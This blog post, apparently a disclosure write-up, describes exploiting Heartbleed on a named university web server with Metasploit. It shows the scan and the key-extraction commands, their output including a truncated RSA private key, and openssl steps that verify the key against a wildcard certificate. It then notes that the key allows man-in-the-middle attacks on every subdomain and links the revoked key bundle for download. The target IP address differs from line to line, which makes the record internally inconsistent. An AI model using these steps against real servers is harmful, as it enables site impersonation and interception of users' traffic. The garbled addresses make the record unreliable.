In this post I will explain how I managed to download the private key of an SSL certificate, essentially allowing me to install a valid copy of it on a personal server, and impersonate any website the original web server is hosting without triggering any validation errors.
Using censys.io I found that the server located at
220.127.116.11, under the domain of ITBA, was vulnerable to Heartbleed because of an outdated OpenSSL installation. To test this, I used the Metasploit Framework, targeted at said IP address.
msf auxiliary(openssl_heartbleed) > set rhosts 18.104.22.168 rhosts => 22.214.171.124 msf auxiliary(openssl_heartbleed) > set action SCAN action => SCAN msf auxiliary(openssl_heartbleed) > run [+] 126.96.36.199:443 - Heartbeat response with leak [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
After confirming that the server was indeed vulnerable, we can now configure Metasploit to fire multiple requests at the server, hoping to find a private key in the memory dumps received. After a few requests, we get the private key of the certificate being used to provide HTTPS access to the web server.
msf auxiliary(openssl_heartbleed) > set action KEYS action => KEYS msf auxiliary(openssl_heartbleed) > run [+] 188.8.131.52:443 - Found factor at offset ef97 [+] 184.108.40.206:443 - 2016-07-24 15:13:09 UTC - Got the private key [*] 220.127.116.11:443 - -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEArHLRNX1uaJiA0pmB76BD+IMJogDBoN7iWN5IBkfBV0y/DzSZ ... -----END RSA PRIVATE KEY-----
Private key verification
To verify the private key, we must first download the certificate of the vulnerable server:
openssl s_client -showcerts -connect sakai.itba.edu.ar:443 CONNECTED(00000003) depth=3 /C=US/O=The Go Daddy Group, Inc./OU=Go Daddy Class 2 Certification Authority verify error:num=19:self signed certificate in certificate chain verify return:0 --- Certificate chain 0 s:/OU=Domain Control Validated/CN=*.itba.edu.ar i:/C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certs.godaddy.com/repository//CN=Go Daddy Secure Certificate Authority - G2 -----BEGIN CERTIFICATE----- MIIFIzCCBAugAwIBAgIJAMokMWzdhblgMA0GCSqGSIb3DQEBCwUAMIG0MQswCQYD ... -----END CERTIFICATE-----
Because the modulus of the keys are too long to compare by eye, we can calculate the MD5 hash of both of them, which is much easier to compare by just looking at it:
$ openssl x509 -noout -modulus -in public.crt | openssl md5 159f5ef1d35895db06ac586e1c15447d $ openssl rsa -noout -modulus -in private.key | openssl md5 159f5ef1d35895db06ac586e1c15447d
As you can see, both keys, the public and private pair, share the same modulus. This must mean that the private key corresponds to the downloaded public pair.
Being a wildcard certificate for
*.itba.edu.ar, we can execute a MITM attack at any subdomain without triggering any validation error, not only to the one used to obtain the certificate.
As the exposed certificate has already been revoked and replaced, I am making it available for everyone to download. Click here to downlaod itba.fullchain.crt.tar.gz